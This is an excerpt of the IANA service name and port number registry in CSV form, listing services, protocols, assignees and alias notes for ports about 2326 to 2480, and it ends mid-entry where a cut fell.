idcp,2326,tcp,IDCP,[Keisokugiken_Corp],[Keisokugiken_Corp],,,,,, idcp,2326,udp,IDCP,[Keisokugiken_Corp],[Keisokugiken_Corp],,,,,, xingcsm,2327,tcp,xingcsm,[Dave_Spencer],[Dave_Spencer],,,,,, xingcsm,2327,udp,xingcsm,[Dave_Spencer],[Dave_Spencer],,,,,, netrix-sftm,2328,tcp,Netrix SFTM,[Garrett_Herschleb],[Garrett_Herschleb],,,,,, netrix-sftm,2328,udp,Netrix SFTM,[Garrett_Herschleb],[Garrett_Herschleb],,,,,, nvd,2329,tcp,NVD,[Peter_Weyman],[Peter_Weyman],,,,,, nvd,2329,udp,NVD,[Peter_Weyman],[Peter_Weyman],,,,,, tscchat,2330,tcp,TSCCHAT,[Mike_Jackson],[Mike_Jackson],,,,,, tscchat,2330,udp,TSCCHAT,[Mike_Jackson],[Mike_Jackson],,,,,, agentview,2331,tcp,AGENTVIEW,[Ram_Iyer],[Ram_Iyer],,,,,, agentview,2331,udp,AGENTVIEW,[Ram_Iyer],[Ram_Iyer],,,,,, rcc-host,2332,tcp,RCC Host,[Martin_Shoemaker],[Martin_Shoemaker],,,,,, rcc-host,2332,udp,RCC Host,[Martin_Shoemaker],[Martin_Shoemaker],,,,,, snapp,2333,tcp,SNAPP,[Dan_Burrows],[Dan_Burrows],2009-09-25,,,,, snapp,2333,udp,SNAPP,[Dan_Burrows],[Dan_Burrows],2009-09-25,,,,, ace-client,2334,tcp,ACE Client Auth,,,,,,,, ace-client,2334,udp,ACE Client Auth,,,,,,,, ace-proxy,2335,tcp,ACE Proxy,[Riaz_Zolfonoon],[Riaz_Zolfonoon],,,,,, ace-proxy,2335,udp,ACE Proxy,[Riaz_Zolfonoon],[Riaz_Zolfonoon],,,,,, appleugcontrol,2336,tcp,Apple UG Control,[Gene_Tyacke],[Gene_Tyacke],,,,,, appleugcontrol,2336,udp,Apple UG Control,[Gene_Tyacke],[Gene_Tyacke],,,,,, ideesrv,2337,tcp,ideesrv,[Marazzi],[Marazzi],,,,,, ideesrv,2337,udp,ideesrv,[Marazzi],[Marazzi],,,,,, norton-lambert,2338,tcp,Norton Lambert,[Richard_de_Mornay],[Richard_de_Mornay],,,,,, norton-lambert,2338,udp,Norton Lambert,[Richard_de_Mornay],[Richard_de_Mornay],,,,,, 3com-webview,2339,tcp,3Com WebView,[Jennifer_Grace],[Jennifer_Grace],,,,,, 3com-webview,2339,udp,3Com WebView,[Jennifer_Grace],[Jennifer_Grace],,,,,, wrs-registry,2340,tcp,"WRS Registry IANA assigned this well-formed service name as a replacement for ""wrs_registry"".",[Christophe_Cleraux],[Christophe_Cleraux],,,,,, wrs_registry,2340,tcp,WRS Registry,[Christophe_Cleraux],[Christophe_Cleraux],,,,,,"This entry is an alias to ""wrs-registry"". This entry is now historic, not usable for use with many common service discovery mechanisms." wrs-registry,2340,udp,"WRS Registry IANA assigned this well-formed service name as a replacement for ""wrs_registry"".",[Christophe_Cleraux],[Christophe_Cleraux],,,,,, wrs_registry,2340,udp,WRS Registry,[Christophe_Cleraux],[Christophe_Cleraux],,,,,,"This entry is an alias to ""wrs-registry"". This entry is now historic, not usable for use with many common service discovery mechanisms." xiostatus,2341,tcp,XIO Status,[Randy_Maas],[Randy_Maas],,,,,, xiostatus,2341,udp,XIO Status,[Randy_Maas],[Randy_Maas],,,,,, manage-exec,2342,tcp,Seagate Manage Exec,[Jim_Flaherty],[Jim_Flaherty],,,,,, manage-exec,2342,udp,Seagate Manage Exec,[Jim_Flaherty],[Jim_Flaherty],,,,,, nati-logos,2343,tcp,nati logos,[James_Juhasz],[James_Juhasz],,,,,, nati-logos,2343,udp,nati logos,[James_Juhasz],[James_Juhasz],,,,,, fcmsys,2344,tcp,fcmsys,,,,,,,, fcmsys,2344,udp,fcmsys,,,,,,,, dbm,2345,tcp,dbm,[Dean_Robson],[Dean_Robson],,,,,, dbm,2345,udp,dbm,[Dean_Robson],[Dean_Robson],,,,,, redstorm-join,2346,tcp,"Game Connection Port IANA assigned this well-formed service name as a replacement for ""redstorm_join"".",,,,,,,, redstorm_join,2346,tcp,Game Connection Port,,,,,,,,"This entry is an alias to ""redstorm-join"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-join,2346,udp,"Game Connection Port IANA assigned this well-formed service name as a replacement for ""redstorm_join"".",,,,,,,, redstorm_join,2346,udp,Game Connection Port,,,,,,,,"This entry is an alias to ""redstorm-join"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-find,2347,tcp,"Game Announcement and Location IANA assigned this well-formed service name as a replacement for ""redstorm_find"".",,,,,,,, redstorm_find,2347,tcp,Game Announcement and Location,,,,,,,,"This entry is an alias to ""redstorm-find"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-find,2347,udp,"Game Announcement and Location IANA assigned this well-formed service name as a replacement for ""redstorm_find"".",,,,,,,, redstorm_find,2347,udp,Game Announcement and Location,,,,,,,,"This entry is an alias to ""redstorm-find"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-info,2348,tcp,"Information to query for game status IANA assigned this well-formed service name as a replacement for ""redstorm_info"".",,,,,,,, redstorm_info,2348,tcp,Information to query for game status,,,,,,,,"This entry is an alias to ""redstorm-info"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-info,2348,udp,"Information to query for game status IANA assigned this well-formed service name as a replacement for ""redstorm_info"".",,,,,,,, redstorm_info,2348,udp,Information to query for game status,,,,,,,,"This entry is an alias to ""redstorm-info"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-diag,2349,tcp,"Diagnostics Port IANA assigned this well-formed service name as a replacement for ""redstorm_diag"".",[David_Weinstein],[David_Weinstein],,,,,, redstorm_diag,2349,tcp,Diagnostics Port,[David_Weinstein],[David_Weinstein],,,,,,"This entry is an alias to ""redstorm-diag"". This entry is now historic, not usable for use with many common service discovery mechanisms." redstorm-diag,2349,udp,"Diagnostics Port IANA assigned this well-formed service name as a replacement for ""redstorm_diag"".",[David_Weinstein],[David_Weinstein],,,,,, redstorm_diag,2349,udp,Diagnostics Port,[David_Weinstein],[David_Weinstein],,,,,,"This entry is an alias to ""redstorm-diag"". This entry is now historic, not usable for use with many common service discovery mechanisms." psbserver,2350,tcp,Pharos Booking Server,,,,,,,, psbserver,2350,udp,Pharos Booking Server,,,,,,,, psrserver,2351,tcp,psrserver,,,,,,,, psrserver,2351,udp,psrserver,,,,,,,, pslserver,2352,tcp,pslserver,,,,,,,, pslserver,2352,udp,pslserver,,,,,,,, pspserver,2353,tcp,pspserver,,,,,,,, pspserver,2353,udp,pspserver,,,,,,,, psprserver,2354,tcp,psprserver,,,,,,,, psprserver,2354,udp,psprserver,,,,,,,, psdbserver,2355,tcp,psdbserver,[Paul_Reddy],[Paul_Reddy],,,,,, psdbserver,2355,udp,psdbserver,[Paul_Reddy],[Paul_Reddy],,,,,, gxtelmd,2356,tcp,GXT License Managemant,[Robert_Hodgson],[Robert_Hodgson],,,,,, gxtelmd,2356,udp,GXT License Managemant,[Robert_Hodgson],[Robert_Hodgson],,,,,, unihub-server,2357,tcp,UniHub Server,[Tim_Kenyon],[Tim_Kenyon],,,,,, unihub-server,2357,udp,UniHub Server,[Tim_Kenyon],[Tim_Kenyon],,,,,, futrix,2358,tcp,Futrix,[Peter_Frankenberg],[Peter_Frankenberg],,,,,, futrix,2358,udp,Futrix,[Peter_Frankenberg],[Peter_Frankenberg],,,,,, flukeserver,2359,tcp,FlukeServer,[Bill_Marbaker],[Bill_Marbaker],,,,,, flukeserver,2359,udp,FlukeServer,[Bill_Marbaker],[Bill_Marbaker],,,,,, nexstorindltd,2360,tcp,NexstorIndLtd,[NexStor_India_Limite],[NexStor_India_Limite],,,,,, nexstorindltd,2360,udp,NexstorIndLtd,[NexStor_India_Limite],[NexStor_India_Limite],,,,,, tl1,2361,tcp,TL1,[Charles_Scott_Robers],[Charles_Scott_Robers],,,,,, tl1,2361,udp,TL1,[Charles_Scott_Robers],[Charles_Scott_Robers],,,,,, digiman,2362,tcp,digiman,[Aaron_S_Kurland],[Aaron_S_Kurland],,,,,, digiman,2362,udp,digiman,[Aaron_S_Kurland],[Aaron_S_Kurland],,,,,, mediacntrlnfsd,2363,tcp,Media Central NFSD,[Shivakumar_S_Govind],[Shivakumar_S_Govind],,,,,, mediacntrlnfsd,2363,udp,Media Central NFSD,[Shivakumar_S_Govind],[Shivakumar_S_Govind],,,,,, oi-2000,2364,tcp,OI-2000,[Software_Horizons_In],[Software_Horizons_In],,,,,, oi-2000,2364,udp,OI-2000,[Software_Horizons_In],[Software_Horizons_In],,,,,, dbref,2365,tcp,dbref,[Yoshihiro_Yamazaki],[Yoshihiro_Yamazaki],,,,,, dbref,2365,udp,dbref,[Yoshihiro_Yamazaki],[Yoshihiro_Yamazaki],,,,,, qip-login,2366,tcp,qip-login,[Mike_Morgan],[Mike_Morgan],,,,,, qip-login,2366,udp,qip-login,[Mike_Morgan],[Mike_Morgan],,,,,, service-ctrl,2367,tcp,Service Control,[Humberto_Sanchez],[Humberto_Sanchez],,,,,, service-ctrl,2367,udp,Service Control,[Humberto_Sanchez],[Humberto_Sanchez],,,,,, opentable,2368,tcp,OpenTable,[Brett_Goldstein],[Brett_Goldstein],,,,,, opentable,2368,udp,OpenTable,[Brett_Goldstein],[Brett_Goldstein],,,,,, ,2369,,Unassigned,,,,,,,,De-registered (28 March 2006) l3-hbmon,2370,tcp,L3-HBMon,[Dolores_Scott],[Dolores_Scott],,2014-04-09,,,, l3-hbmon,2370,udp,L3-HBMon,[Dolores_Scott],[Dolores_Scott],,2014-04-09,,,, hp-rda,2371,tcp,HP Remote Device Access,[Hewlett_Packard_3],[Michael_Spratte][Steve_Roscio],,2014-04-09,,,, ,2371,udp,Reserved,,,,2014-04-09,,,, lanmessenger,2372,tcp,LanMessenger,[Garrett_Padera],[Garrett_Padera],2008-02-01,,,,, lanmessenger,2372,udp,LanMessenger,[Garrett_Padera],[Garrett_Padera],2008-02-01,,,,, remographlm,2373,tcp,Remograph License Manager,[Per_Fahlberg],[Per_Fahlberg],2009-01-21,,,,, ,2373,udp,Reserved,,,,,,,, hydra,2374,tcp,Hydra RPC,[Jacob_Feisley],[Jacob_Feisley],2009-01-21,,,,, ,2374,udp,Reserved,,,,,,,, docker,2375,tcp,Docker REST API (plain text),[DOCKER],[Christopher_Liljenstolpe],2014-04-17,,,,, ,2375,udp,Reserved,,,,,,,, docker-s,2376,tcp,Docker REST API (ssl),[DOCKER],[Christopher_Liljenstolpe],2014-04-17,,,,, ,2377-2378,,Unassigned,,,,,,,, etcd-client,2379,tcp,etcd client communication,[CoreOS],[Brian_Harrington],2014-07-09,,,,, ,2379,udp,Reserved,,,,,,,, etcd-server,2380,tcp,etcd server to server communication,[CoreOS],[Brian_Harrington],2014-07-09,,,,, ,2380,udp,Reserved,,,,,,,, compaq-https,2381,tcp,Compaq HTTPS,[Scott_Shaffer],[Scott_Shaffer],,,,,, compaq-https,2381,udp,Compaq HTTPS,[Scott_Shaffer],[Scott_Shaffer],,,,,, ms-olap3,2382,tcp,Microsoft OLAP,,,,,,,, ms-olap3,2382,udp,Microsoft OLAP,,,,,,,, ms-olap4,2383,tcp,Microsoft OLAP,[Mosha_Pasumansky],[Mosha_Pasumansky],,,,,, ms-olap4,2383,udp,Microsoft OLAP,[Mosha_Pasumansky],[Mosha_Pasumansky],,,,,, sd-request,2384,tcp,SD-REQUEST,,,,,,,, sd-capacity,2384,udp,SD-CAPACITY,[Jason_McManus_2],[Jason_McManus_2],,,,,, sd-data,2385,tcp,SD-DATA,[Jason_McManus_2],[Jason_McManus_2],,,,,, sd-data,2385,udp,SD-DATA,[Jason_McManus_2],[Jason_McManus_2],,,,,, virtualtape,2386,tcp,Virtual Tape,,,,,,,, virtualtape,2386,udp,Virtual Tape,,,,,,,, vsamredirector,2387,tcp,VSAM Redirector,[Ingo_Franzki],[Ingo_Franzki],,,,,, vsamredirector,2387,udp,VSAM Redirector,[Ingo_Franzki],[Ingo_Franzki],,,,,, mynahautostart,2388,tcp,MYNAH AutoStart,[Thomas_J_Klehr],[Thomas_J_Klehr],,,,,, mynahautostart,2388,udp,MYNAH AutoStart,[Thomas_J_Klehr],[Thomas_J_Klehr],,,,,, ovsessionmgr,2389,tcp,OpenView Session Mgr,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, ovsessionmgr,2389,udp,OpenView Session Mgr,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, rsmtp,2390,tcp,RSMTP,[Geoff_Collyer],[Geoff_Collyer],,,,,, rsmtp,2390,udp,RSMTP,[Geoff_Collyer],[Geoff_Collyer],,,,,, 3com-net-mgmt,2391,tcp,3COM Net Management,[Prathibha_Nagvar],[Prathibha_Nagvar],,,,,, 3com-net-mgmt,2391,udp,3COM Net Management,[Prathibha_Nagvar],[Prathibha_Nagvar],,,,,, tacticalauth,2392,tcp,Tactical Auth,[David_Yon],[David_Yon],,,,,, tacticalauth,2392,udp,Tactical Auth,[David_Yon],[David_Yon],,,,,, ms-olap1,2393,tcp,MS OLAP 1,,,,,,,, ms-olap1,2393,udp,MS OLAP 1,,,,,,,, ms-olap2,2394,tcp,MS OLAP 2,[Mosha_Pasumansky],[Mosha_Pasumansky],,,,,, ms-olap2,2394,udp,MS OLAP 2,[Mosha_Pasumansky],[Mosha_Pasumansky],,,,,, lan900-remote,2395,tcp,"LAN900 Remote IANA assigned this well-formed service name as a replacement for ""lan900_remote"".",[Tom_Quinlan],[Tom_Quinlan],,,,,, lan900_remote,2395,tcp,LAN900 Remote,[Tom_Quinlan],[Tom_Quinlan],,,,,,"This entry is an alias to ""lan900-remote"". This entry is now historic, not usable for use with many common service discovery mechanisms." lan900-remote,2395,udp,"LAN900 Remote IANA assigned this well-formed service name as a replacement for ""lan900_remote"".",[Tom_Quinlan],[Tom_Quinlan],,,,,, lan900_remote,2395,udp,LAN900 Remote,[Tom_Quinlan],[Tom_Quinlan],,,,,,"This entry is an alias to ""lan900-remote"". This entry is now historic, not usable for use with many common service discovery mechanisms." wusage,2396,tcp,Wusage,[Thomas_Boutell],[Thomas_Boutell],,,,,, wusage,2396,udp,Wusage,[Thomas_Boutell],[Thomas_Boutell],,,,,, ncl,2397,tcp,NCL,[Robert_Wiebe],[Robert_Wiebe],,,,,, ncl,2397,udp,NCL,[Robert_Wiebe],[Robert_Wiebe],,,,,, orbiter,2398,tcp,Orbiter,[David_Goldberg],[David_Goldberg],,,,,, orbiter,2398,udp,Orbiter,[David_Goldberg],[David_Goldberg],,,,,, fmpro-fdal,2399,tcp,"FileMaker, Inc. - Data Access Layer",[Clay_Maeckal],[Clay_Maeckal],,,,,, fmpro-fdal,2399,udp,"FileMaker, Inc. - Data Access Layer",[Clay_Maeckal],[Clay_Maeckal],,,,,, opequus-server,2400,tcp,OpEquus Server,[Gavin_Hutchinson_2],[Gavin_Hutchinson_2],,,,,, opequus-server,2400,udp,OpEquus Server,[Gavin_Hutchinson_2],[Gavin_Hutchinson_2],,,,,, cvspserver,2401,tcp,cvspserver,[Jim_Kingdon],[Jim_Kingdon],,,,,, cvspserver,2401,udp,cvspserver,[Jim_Kingdon],[Jim_Kingdon],,,,,, taskmaster2000,2402,tcp,TaskMaster 2000 Server,,,,,,,, taskmaster2000,2402,udp,TaskMaster 2000 Server,,,,,,,, taskmaster2000,2403,tcp,TaskMaster 2000 Web,[Ed_Odjaghian],[Ed_Odjaghian],,,,,, taskmaster2000,2403,udp,TaskMaster 2000 Web,[Ed_Odjaghian],[Ed_Odjaghian],,,,,, iec-104,2404,tcp,IEC 60870-5-104 process control over IP,[Walter_K_Eichelburg],[Walter_K_Eichelburg],,,,,, iec-104,2404,udp,IEC 60870-5-104 process control over IP,[Walter_K_Eichelburg],[Walter_K_Eichelburg],,,,,, trc-netpoll,2405,tcp,TRC Netpoll,[Bizhan_Ghavami],[Bizhan_Ghavami],,,,,, trc-netpoll,2405,udp,TRC Netpoll,[Bizhan_Ghavami],[Bizhan_Ghavami],,,,,, jediserver,2406,tcp,JediServer,[Paul_McEntire],[Paul_McEntire],,,,,, jediserver,2406,udp,JediServer,[Paul_McEntire],[Paul_McEntire],,,,,, orion,2407,tcp,Orion,[Matthew_Horoschun],[Matthew_Horoschun],,,,,, orion,2407,udp,Orion,[Matthew_Horoschun],[Matthew_Horoschun],,,,,, railgun-webaccl,2408,tcp,CloudFlare Railgun Web Acceleration Protocol,[CloudFlare],[John_Graham_Cumming],,2012-03-09,,,, ,2408,udp,Reserved,,,,2012-03-09,,,,This entry is being removed on 2012-03-09. sns-protocol,2409,tcp,SNS Protocol,[Amir_Blich],[Amir_Blich],,,,,, sns-protocol,2409,udp,SNS Protocol,[Amir_Blich],[Amir_Blich],,,,,, vrts-registry,2410,tcp,VRTS Registry,[Pranay_Varma],[Pranay_Varma],,,,,, vrts-registry,2410,udp,VRTS Registry,[Pranay_Varma],[Pranay_Varma],,,,,, netwave-ap-mgmt,2411,tcp,Netwave AP Management,[Johnny_Zweig],[Johnny_Zweig],,,,,, netwave-ap-mgmt,2411,udp,Netwave AP Management,[Johnny_Zweig],[Johnny_Zweig],,,,,, cdn,2412,tcp,CDN,[Alan_Noble],[Alan_Noble],,,,,, cdn,2412,udp,CDN,[Alan_Noble],[Alan_Noble],,,,,, orion-rmi-reg,2413,tcp,orion-rmi-reg,[J_S_Greenfield_2],[J_S_Greenfield_2],,,,,, orion-rmi-reg,2413,udp,orion-rmi-reg,[J_S_Greenfield_2],[J_S_Greenfield_2],,,,,, beeyond,2414,tcp,Beeyond,[Bob_Deblier],[Bob_Deblier],,,,,, beeyond,2414,udp,Beeyond,[Bob_Deblier],[Bob_Deblier],,,,,, codima-rtp,2415,tcp,Codima Remote Transaction Protocol,[Sylvia_Ross],[Sylvia_Ross],,,,,, codima-rtp,2415,udp,Codima Remote Transaction Protocol,[Sylvia_Ross],[Sylvia_Ross],,,,,, rmtserver,2416,tcp,RMT Server,[Yvon_Marineau],[Yvon_Marineau],,,,,, rmtserver,2416,udp,RMT Server,[Yvon_Marineau],[Yvon_Marineau],,,,,, composit-server,2417,tcp,Composit Server,[Katsuaki_Naoi],[Katsuaki_Naoi],,,,,, composit-server,2417,udp,Composit Server,[Katsuaki_Naoi],[Katsuaki_Naoi],,,,,, cas,2418,tcp,cas,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, cas,2418,udp,cas,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, attachmate-s2s,2419,tcp,Attachmate S2S,[Chris_Rominski],[Chris_Rominski],,,,,, attachmate-s2s,2419,udp,Attachmate S2S,[Chris_Rominski],[Chris_Rominski],,,,,, dslremote-mgmt,2420,tcp,DSL Remote Management,[Westell],[Westell],,,,,, dslremote-mgmt,2420,udp,DSL Remote Management,[Westell],[Westell],,,,,, g-talk,2421,tcp,G-Talk,[Matt_Hammond],[Matt_Hammond],,,,,, g-talk,2421,udp,G-Talk,[Matt_Hammond],[Matt_Hammond],,,,,, crmsbits,2422,tcp,CRMSBITS,[Rod_Ward],[Rod_Ward],,,,,, crmsbits,2422,udp,CRMSBITS,[Rod_Ward],[Rod_Ward],,,,,, rnrp,2423,tcp,RNRP,[Per_Sahlqvist],[Per_Sahlqvist],,,,,, rnrp,2423,udp,RNRP,[Per_Sahlqvist],[Per_Sahlqvist],,,,,, kofax-svr,2424,tcp,KOFAX-SVR,[Steven_Kilby],[Steven_Kilby],2011-04-25,,,,, kofax-svr,2424,udp,KOFAX-SVR,[Steven_Kilby],[Steven_Kilby],2011-04-25,,,,, fjitsuappmgr,2425,tcp,Fujitsu App Manager,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, fjitsuappmgr,2425,udp,Fujitsu App Manager,[Hiroyuki_Kawabuchi],[Hiroyuki_Kawabuchi],,,,,, ,2426,,Unassigned,,,,2002-04-29,,,, mgcp-gateway,2427,tcp,Media Gateway Control Protocol Gateway,[Christian_Huitema],[Christian_Huitema],,,,,, mgcp-gateway,2427,udp,Media Gateway Control Protocol Gateway,[Christian_Huitema],[Christian_Huitema],,,,,, ott,2428,tcp,One Way Trip Time,[Greg_Troxel],[Greg_Troxel],,,,,, ott,2428,udp,One Way Trip Time,[Greg_Troxel],[Greg_Troxel],,,,,, ft-role,2429,tcp,FT-ROLE,[Doug_Boone],[Doug_Boone],,,,,, ft-role,2429,udp,FT-ROLE,[Doug_Boone],[Doug_Boone],,,,,, venus,2430,tcp,venus,,,,,,,, venus,2430,udp,venus,,,,,,,, venus-se,2431,tcp,venus-se,,,,,,,, venus-se,2431,udp,venus-se,,,,,,,, codasrv,2432,tcp,codasrv,,,,,,,, codasrv,2432,udp,codasrv,,,,,,,, codasrv-se,2433,tcp,codasrv-se,[Robert_Watson],[Robert_Watson],,,,,, codasrv-se,2433,udp,codasrv-se,[Robert_Watson],[Robert_Watson],,,,,, pxc-epmap,2434,tcp,pxc-epmap,[Jun_Nakamura],[Jun_Nakamura],,,,,, pxc-epmap,2434,udp,pxc-epmap,[Jun_Nakamura],[Jun_Nakamura],,,,,, optilogic,2435,tcp,OptiLogic,[Clark_Williams],[Clark_Williams],,,,,, optilogic,2435,udp,OptiLogic,[Clark_Williams],[Clark_Williams],,,,,, topx,2436,tcp,TOP/X,[Dragos_Pop],[Dragos_Pop],,,,,, topx,2436,udp,TOP/X,[Dragos_Pop],[Dragos_Pop],,,,,, unicontrol,2437,tcp,UniControl,[Ing_Markus_Huemer],[Ing_Markus_Huemer],,,,,, unicontrol,2437,udp,UniControl,[Ing_Markus_Huemer],[Ing_Markus_Huemer],,,,,, msp,2438,tcp,MSP,[Evan_Caves],[Evan_Caves],,,,,, msp,2438,udp,MSP,[Evan_Caves],[Evan_Caves],,,,,, sybasedbsynch,2439,tcp,SybaseDBSynch,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, sybasedbsynch,2439,udp,SybaseDBSynch,[Dave_Neudoerffer],[Dave_Neudoerffer],,,,,, spearway,2440,tcp,Spearway Lockers,[Pierre_Frisch],[Pierre_Frisch],,,,,, spearway,2440,udp,Spearway Lockers,[Pierre_Frisch],[Pierre_Frisch],,,,,, pvsw-inet,2441,tcp,Pervasive I*net Data Server,[Chuck_Talk],[Chuck_Talk],,,,,, pvsw-inet,2441,udp,Pervasive I*net Data Server,[Chuck_Talk],[Chuck_Talk],,,,,, netangel,2442,tcp,Netangel,[Ladislav_Baranyay],[Ladislav_Baranyay],,,,,, netangel,2442,udp,Netangel,[Ladislav_Baranyay],[Ladislav_Baranyay],,,,,, powerclientcsf,2443,tcp,PowerClient Central Storage Facility,[Brian_Klassen],[Brian_Klassen],,,,,, powerclientcsf,2443,udp,PowerClient Central Storage Facility,[Brian_Klassen],[Brian_Klassen],,,,,, btpp2sectrans,2444,tcp,BT PP2 Sectrans,[Ian_Daniels],[Ian_Daniels],,,,,, btpp2sectrans,2444,udp,BT PP2 Sectrans,[Ian_Daniels],[Ian_Daniels],,,,,, dtn1,2445,tcp,DTN1,[Bob_Gaddie],[Bob_Gaddie],,,,,, dtn1,2445,udp,DTN1,[Bob_Gaddie],[Bob_Gaddie],,,,,, bues-service,2446,tcp,"bues_service IANA assigned this well-formed service name as a replacement for ""bues_service"".",[Leonhard_Diekmann],[Leonhard_Diekmann],,,,,, bues_service,2446,tcp,bues_service,[Leonhard_Diekmann],[Leonhard_Diekmann],,,,,,"This entry is an alias to ""bues-service"". This entry is now historic, not usable for use with many common service discovery mechanisms." bues-service,2446,udp,"bues_service IANA assigned this well-formed service name as a replacement for ""bues_service"".",[Leonhard_Diekmann],[Leonhard_Diekmann],,,,,, bues_service,2446,udp,bues_service,[Leonhard_Diekmann],[Leonhard_Diekmann],,,,,,"This entry is an alias to ""bues-service"". This entry is now historic, not usable for use with many common service discovery mechanisms." ovwdb,2447,tcp,OpenView NNM daemon,[Eric_Pulsipher_2],[Eric_Pulsipher_2],,,,,, ovwdb,2447,udp,OpenView NNM daemon,[Eric_Pulsipher_2],[Eric_Pulsipher_2],,,,,, hpppssvr,2448,tcp,hpppsvr,[Bridgette_Landers],[Bridgette_Landers],,,,,, hpppssvr,2448,udp,hpppsvr,[Bridgette_Landers],[Bridgette_Landers],,,,,, ratl,2449,tcp,RATL,[Paul_Greenfield],[Paul_Greenfield],,,,,, ratl,2449,udp,RATL,[Paul_Greenfield],[Paul_Greenfield],,,,,, netadmin,2450,tcp,netadmin,,,,,,,, netadmin,2450,udp,netadmin,,,,,,,, netchat,2451,tcp,netchat,[Julian_Mehnle],[Julian_Mehnle],,,,,, netchat,2451,udp,netchat,[Julian_Mehnle],[Julian_Mehnle],,,,,, snifferclient,2452,tcp,SnifferClient,[Amy_Weaver_2],[Amy_Weaver_2],,,,,, snifferclient,2452,udp,SnifferClient,[Amy_Weaver_2],[Amy_Weaver_2],,,,,, madge-ltd,2453,tcp,madge ltd,[Mark_Lyall],[Mark_Lyall],,,,,, madge-ltd,2453,udp,madge ltd,[Mark_Lyall],[Mark_Lyall],,,,,, indx-dds,2454,tcp,IndX-DDS,[Paul_Carmichael],[Paul_Carmichael],,,,,, indx-dds,2454,udp,IndX-DDS,[Paul_Carmichael],[Paul_Carmichael],,,,,, wago-io-system,2455,tcp,WAGO-IO-SYSTEM,[Jorg_Hoffmann],[Jorg_Hoffmann],,,,,, wago-io-system,2455,udp,WAGO-IO-SYSTEM,[Jorg_Hoffmann],[Jorg_Hoffmann],,,,,, altav-remmgt,2456,tcp,altav-remmgt,[Gary_M_Allen],[Gary_M_Allen],,,,,, altav-remmgt,2456,udp,altav-remmgt,[Gary_M_Allen],[Gary_M_Allen],,,,,, rapido-ip,2457,tcp,Rapido_IP,[Man_Shuen_Cheung],[Man_Shuen_Cheung],,,,,, rapido-ip,2457,udp,Rapido_IP,[Man_Shuen_Cheung],[Man_Shuen_Cheung],,,,,, griffin,2458,tcp,griffin,[Tom_Taylor],[Tom_Taylor],,,,,, griffin,2458,udp,griffin,[Tom_Taylor],[Tom_Taylor],,,,,, community,2459,tcp,Community,[David_Schwartz],[David_Schwartz],,,,,, community,2459,udp,Community,[David_Schwartz],[David_Schwartz],,,,,, ms-theater,2460,tcp,ms-theater,[Anton_Kucer],[Anton_Kucer],,,,,, ms-theater,2460,udp,ms-theater,[Anton_Kucer],[Anton_Kucer],,,,,, qadmifoper,2461,tcp,qadmifoper,,,,,,,, qadmifoper,2461,udp,qadmifoper,,,,,,,, qadmifevent,2462,tcp,qadmifevent,[Pekka_Takaranta],[Pekka_Takaranta],,,,,, qadmifevent,2462,udp,qadmifevent,[Pekka_Takaranta],[Pekka_Takaranta],,,,,, lsi-raid-mgmt,2463,tcp,LSI RAID Management,[Kevin_Copas],[Kevin_Copas],2008-02-07,,,,, lsi-raid-mgmt,2463,udp,LSI RAID Management,[Kevin_Copas],[Kevin_Copas],2008-02-07,,,,, direcpc-si,2464,tcp,DirecPC SI,[Doug_Dillon],[Doug_Dillon],,,,,, direcpc-si,2464,udp,DirecPC SI,[Doug_Dillon],[Doug_Dillon],,,,,, lbm,2465,tcp,Load Balance Management,,,,,,,, lbm,2465,udp,Load Balance Management,,,,,,,, lbf,2466,tcp,Load Balance Forwarding,[Kazuhiro_Koide],[Kazuhiro_Koide],,,,,, lbf,2466,udp,Load Balance Forwarding,[Kazuhiro_Koide],[Kazuhiro_Koide],,,,,, high-criteria,2467,tcp,High Criteria,[Konstantin_Iavid],[Konstantin_Iavid],,,,,, high-criteria,2467,udp,High Criteria,[Konstantin_Iavid],[Konstantin_Iavid],,,,,, qip-msgd,2468,tcp,qip_msgd,[Mike_Morgan],[Mike_Morgan],,,,,, qip-msgd,2468,udp,qip_msgd,[Mike_Morgan],[Mike_Morgan],,,,,, mti-tcs-comm,2469,tcp,MTI-TCS-COMM,[Mario_Bonin],[Mario_Bonin],,,,,, mti-tcs-comm,2469,udp,MTI-TCS-COMM,[Mario_Bonin],[Mario_Bonin],,,,,, taskman-port,2470,tcp,taskman port,[Boris_Panteleev],[Boris_Panteleev],,,,,, taskman-port,2470,udp,taskman port,[Boris_Panteleev],[Boris_Panteleev],,,,,, seaodbc,2471,tcp,SeaODBC,[Adrian_Hornby],[Adrian_Hornby],,,,,, seaodbc,2471,udp,SeaODBC,[Adrian_Hornby],[Adrian_Hornby],,,,,, c3,2472,tcp,C3,[Eckhard_Grieger],[Eckhard_Grieger],,,,,, c3,2472,udp,C3,[Eckhard_Grieger],[Eckhard_Grieger],,,,,, aker-cdp,2473,tcp,Aker-cdp,[Rodrigo_Ormonde],[Rodrigo_Ormonde],,,,,, aker-cdp,2473,udp,Aker-cdp,[Rodrigo_Ormonde],[Rodrigo_Ormonde],,,,,, vitalanalysis,2474,tcp,Vital Analysis,[Srinivas_Reddy],[Srinivas_Reddy],,,,,, vitalanalysis,2474,udp,Vital Analysis,[Srinivas_Reddy],[Srinivas_Reddy],,,,,, ace-server,2475,tcp,ACE Server,,,,,,,, ace-server,2475,udp,ACE Server,,,,,,,, ace-svr-prop,2476,tcp,ACE Server Propagation,,,,,,,, ace-svr-prop,2476,udp,ACE Server Propagation,,,,,,,, ssm-cvs,2477,tcp,SecurSight Certificate Valifation Service,,,,,,,, ssm-cvs,2477,udp,SecurSight Certificate Valifation Service,,,,,,,, ssm-cssps,2478,tcp,SecurSight Authentication Server (SSL),,,,,,,, ssm-cssps,2478,udp,SecurSight Authentication Server (SSL),,,,,,,, ssm-els,2479,tcp,SecurSight Event Logging Server (SSL),[John_Linn],[John_Linn],,,,,, ssm-els,2479,udp,SecurSight Event Logging Server (SSL),[John_Linn],[John_Linn],,,,,, powerexchange,2480,tcp,Informatica PowerExchange Listener,[Dale_Norman],[Dale_Norman],,,,,, powerexchange,2480,udp,Informatica 